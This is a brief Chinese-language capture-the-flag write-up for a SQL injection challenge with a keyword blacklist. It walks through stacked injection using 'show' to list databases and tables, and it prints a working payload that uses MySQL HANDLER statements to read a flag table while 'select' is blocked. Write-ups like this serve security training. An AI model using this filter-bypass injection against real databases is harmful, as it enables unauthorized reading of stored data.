1,访问界面
思路:sqli
题目提示:黑名单
2,利用Burp测试过滤关键字
没有限制关键字show,通过堆叠注入查看库名
3,查看表
4,查看表的结构
发现flag列,推测其应为flag,尝试获取内容,但是因为select被限制,查了一些资料了解HANDLER语法可以绕过select限制
5,查看flag
1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;
handler句柄使用知识点
打开句柄
mysql> handler table_name open;
read first查看数据
mysql> handler table_name read first;
read next读取下一条数据
mysql> handler table_name read next;
关闭句柄
mysql> handler table_name close;